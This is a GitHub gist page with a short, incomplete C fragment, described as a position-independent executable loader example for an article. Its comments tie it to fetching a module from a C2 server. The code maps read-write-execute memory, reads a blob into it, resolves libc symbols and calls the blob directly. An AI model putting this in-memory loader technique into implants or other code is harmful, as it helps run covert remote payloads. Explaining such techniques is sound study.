Created
December 23, 2020 22:07
-
-
Save khyberspache/70adfe400031da57c1661579bc7e7585 to your computer and use it in GitHub Desktop.
Position Independent Executable loader example for article
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Request the pie_blob module from the C2 server | |
| // mmap exectuable memory | |
| fptr = mmap(NULL, sb.st_size, PROT_READ | PROT_EXEC | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); | |
| // read the blob into memory | |
| result = fread(fptr, 1, sb.st_size, pBlob); | |
| // grab whatever libraries/symbols I want (or even better, just get pointers to dlsym/dlopen) | |
| handle = dlopen(LIBC_FILE, RTLD_LAZY); | |
| *(void**) (&ex) = dlsym(handle, "exit"); | |
| // then literally just call the function in pie_blob | |
| int i = 1; | |
| i = ((int(*)(int))fptr)(i); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment